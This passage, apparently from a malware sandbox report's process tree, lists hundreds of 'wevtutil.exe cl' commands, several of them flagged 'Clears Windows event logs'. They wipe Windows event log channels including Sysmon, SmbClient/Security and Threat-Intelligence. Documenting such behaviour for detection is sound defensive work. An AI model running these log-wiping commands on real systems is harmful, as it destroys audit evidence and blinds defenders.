- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
  2⤵
  PID:1648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX/Analytic"
  2⤵
  PID:3956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
  2⤵
  PID:1084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
  2⤵
  PID:2768
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-Vault/Performance"
  2⤵
  - Clears Windows event logs
  PID:2460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Admin"
  2⤵
  PID:1632
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
  2⤵
  PID:3712
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Perf"
  2⤵
  PID:3232
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SendTo/Diagnostic"
  2⤵
  PID:2532
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
  2⤵
  PID:4068
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
  2⤵
  PID:3700
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sensors/Performance"
  2⤵
  - Clears Windows event logs
  PID:1288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
  2⤵
  PID:4060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension/Analytic"
  2⤵
  PID:956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
  2⤵
  PID:1472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:740
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
  2⤵
  PID:4128
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Servicing/Debug"
  2⤵
  PID:1832
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
  2⤵
  PID:2976
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Operational"
  2⤵
  PID:3160
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Analytic"
  2⤵
  PID:5076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Debug"
  2⤵
  PID:3916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
  2⤵
  PID:2028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync/Analytic"
  2⤵
  PID:3672
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync/Debug"
  2⤵
  PID:2040
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync/Operational"
  2⤵
  PID:4152
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
  2⤵
  PID:760
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
  2⤵
  PID:4304
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
  2⤵
  PID:1608
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SetupPlatform/Analytic"
  2⤵
  PID:2564
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
  2⤵
  - Clears Windows event logs
  PID:1884
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
  2⤵
  PID:4620
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
  2⤵
  PID:4288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
  2⤵
  PID:2580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
  2⤵
  PID:1140
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
  2⤵
  PID:2152
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
  2⤵
  PID:4540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
  2⤵
  PID:2252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
  2⤵
  PID:3812
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
  2⤵
  PID:4200
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
  2⤵
  PID:1612
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
  2⤵
  PID:1888
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-Core/ActionCenter"
  2⤵
  PID:220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-Core/AppDefaults"
  2⤵
  PID:1328
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
  2⤵
  PID:2336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-Core/LogonTasksChannel"
  2⤵
  PID:312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-Core/Operational"
  2⤵
  PID:4116
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
  2⤵
  PID:3368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
  2⤵
  PID:3364
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-OpenWith/Diagnostic"
  2⤵
  PID:5008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
  2⤵
  PID:3492
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
  2⤵
  PID:4576
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
  2⤵
  PID:3104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
  2⤵
  PID:376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
  2⤵
  PID:3116
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SleepStudy/Diagnostic"
  2⤵
  PID:1020
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
  2⤵
  PID:3476
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
  2⤵
  PID:2964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
  2⤵
  PID:2312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
  2⤵
  PID:2648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmartScreen/Debug"
  2⤵
  PID:1460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmbClient/Audit"
  2⤵
  PID:2368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmbClient/Connectivity"
  2⤵
  PID:5064
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmbClient/Diagnostic"
  2⤵
  PID:4308
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
  2⤵
  PID:1060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
  2⤵
  PID:2748
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
  2⤵
  PID:636
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
  2⤵
  PID:4420
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Spellchecking-Host/Analytic"
  2⤵
  PID:4500
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SruMon/Diagnostic"
  2⤵
  PID:4384
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SrumTelemetry"
  2⤵
  PID:3716
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StateRepository/Debug"
  2⤵
  PID:3256
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StateRepository/Diagnostic"
  2⤵
  PID:860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
  2⤵
  PID:2592
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StateRepository/Restricted"
  2⤵
  PID:1480
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
  2⤵
  PID:4596
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
  2⤵
  PID:4036
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Admin"
  2⤵
  PID:5108
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Analytic"
  2⤵
  - Clears Windows event logs
  PID:4752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Debug"
  2⤵
  PID:4788
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Diagnose"
  2⤵
  - Clears Windows event logs
  PID:4828
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Operational"
  2⤵
  PID:440
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Admin"
  2⤵
  PID:1988
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Analytic"
  2⤵
  PID:2792
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Debug"
  2⤵
  PID:1144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Diagnose"
  2⤵
  PID:3784
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Operational"
  2⤵
  PID:4204
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Admin"
  2⤵
  PID:4364
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Analytic"
  2⤵
  PID:1184
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Debug"
  2⤵
  PID:3960
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Diagnose"
  2⤵
  PID:1872
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Operational"
  2⤵
  PID:4800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Admin"
  2⤵
  PID:4496
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Analytic"
  2⤵
  PID:4348
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Debug"
  2⤵
  PID:1580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Diagnose"
  2⤵
  PID:1500
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Health"
  2⤵
  PID:2376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Operational"
  2⤵
  PID:3708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Tiering-IoHeat/Heat"
  2⤵
  PID:1252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storage-Tiering/Admin"
  2⤵
  PID:1484
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageManagement/Debug"
  2⤵
  PID:1228
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageManagement/Operational"
  2⤵
  PID:2272
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageSettings/Diagnostic"
  2⤵
  PID:2896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Diagnostic"
  2⤵
  PID:2280
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Operational"
  2⤵
  - Clears Windows event logs
  PID:8
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Performance"
  2⤵
  PID:1984
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
  2⤵
  PID:4120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic"
  2⤵
  PID:964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Operational"
  2⤵
  PID:3128
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Store/Operational"
  2⤵
  PID:3444
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Storsvc/Diagnostic"
  2⤵
  PID:4376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
  2⤵
  PID:428
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
  2⤵
  - Clears Windows event logs
  PID:548
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
  2⤵
  PID:3884
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Superfetch/PfApLog"
  2⤵
  PID:1672
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
  2⤵
  PID:1472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"
  2⤵
  PID:4088
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
  2⤵
  PID:3980
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-System-Profile-HardwareId/Diagnostic"
  2⤵
  PID:3160
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SystemSettingsHandlers/Debug"
  2⤵
  PID:5076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Debug"
  2⤵
  PID:3916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Diagnostic"
  2⤵
  PID:2028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Operational"
  2⤵
  PID:3360
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
  2⤵
  PID:728
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TCPIP/Operational"
  2⤵
  PID:3168
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
  2⤵
  PID:3292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
  2⤵
  PID:4468
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
  2⤵
  PID:4300
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
  2⤵
  PID:1104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TTS/Diagnostic"
  2⤵
  PID:2284
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TWinAPI/Diagnostic"
  2⤵
  PID:404
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TWinUI/Diagnostic"
  2⤵
  PID:4244
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TWinUI/Operational"
  2⤵
  PID:4124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TZSync/Analytic"
  2⤵
  PID:4852
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TZSync/Operational"
  2⤵
  PID:516
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
  2⤵
  PID:3724
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
  2⤵
  PID:3472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
  2⤵
  PID:4104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Maintenance"
  2⤵
  PID:4452
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
  2⤵
  PID:4292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
  2⤵
  PID:4896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
  2⤵
  PID:3780
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
  2⤵
  PID:4844
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
  2⤵
  PID:4464
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
  2⤵
  PID:944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
  2⤵
  PID:3132
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
  2⤵
  PID:1196
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
  2⤵
  PID:4968
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
  2⤵
  PID:1180
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
  2⤵
  PID:3540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
  2⤵
  PID:2196
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
  2⤵
  PID:5012
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
  2⤵
  PID:1340
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
  2⤵
  PID:3208
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Admin"
  2⤵
  - Clears Windows event logs
  PID:1912
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Analytic"
  2⤵
  PID:5048
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Debug"
  2⤵
  PID:4212
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Operational"
  2⤵
  PID:4920
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
  2⤵
  PID:456
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
  2⤵
  PID:1436
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
  2⤵
  PID:5072
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
  2⤵
  PID:5100
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
  2⤵
  PID:4252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
  2⤵
  PID:4940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
  2⤵
  PID:3144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
  2⤵
  PID:3048
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
  2⤵
  PID:1924
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
  2⤵
  PID:4560
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
  2⤵
  PID:4816
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
  2⤵
  PID:1788
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
  2⤵
  PID:1524
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Tethering-Manager/Analytic"
  2⤵
  PID:4460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Tethering-Station/Analytic"
  2⤵
  - Clears Windows event logs
  PID:3096
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
  2⤵
  PID:3940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
  2⤵
  PID:1216
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Threat-Intelligence/Analytic"
  2⤵
  PID:4988
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Time-Service-PTP-Provider/PTP-Operational"
  2⤵
  - Clears Windows event logs
  PID:2308
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Time-Service/Operational"
  2⤵
  PID:868
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Troubleshooting-Recommended/Admin"
  2⤵
  PID:2760
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Troubleshooting-Recommended/Operational"
  2⤵
  PID:4828
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
  2⤵
  PID:440
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
  2⤵
  PID:1988
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
  2⤵
  PID:2792
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UI-Shell/Diagnostic"
  2⤵
  PID:1144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
  2⤵
  PID:3784
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
  2⤵
  PID:4204
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
  2⤵
  PID:4364
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
  2⤵
  PID:1916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
  2⤵
  PID:1184
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-USB-MAUSBHOST-Analytic"
  2⤵
  PID:1872
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-USB-UCX-Analytic"
  2⤵
  PID:4800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
  2⤵
  PID:4496
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-USB-USBHUB3-Analytic"
  2⤵
  PID:4348
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
  2⤵
  PID:1580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-USB-USBXHCI-Analytic"
  2⤵
  PID:1500
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-USB-USBXHCI-Trustlet-Analytic"
  2⤵
  PID:2376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UniversalTelemetryClient/Operational"
  2⤵
  - Clears Windows event logs
  PID:3708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
  2⤵
  PID:1252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Control Panel Usage/Diagnostic"
  2⤵
  PID:1484
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Control Panel/Diagnostic"
  2⤵
  PID:1228
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Control Panel/Operational"
  2⤵
  PID:936
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Device Registration/Admin"
  2⤵
  PID:4336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Device Registration/Debug"
  2⤵
  PID:4512
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
  2⤵
  PID:3956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
  2⤵
  PID:1084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
  2⤵
  PID:2768
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-User-Loader/Operational"
  2⤵
  PID:4572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UserAccountControl/Diagnostic"
  2⤵
  PID:1632
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
  2⤵
  PID:3712
- C:\Windows\system32\wevtutil.exe
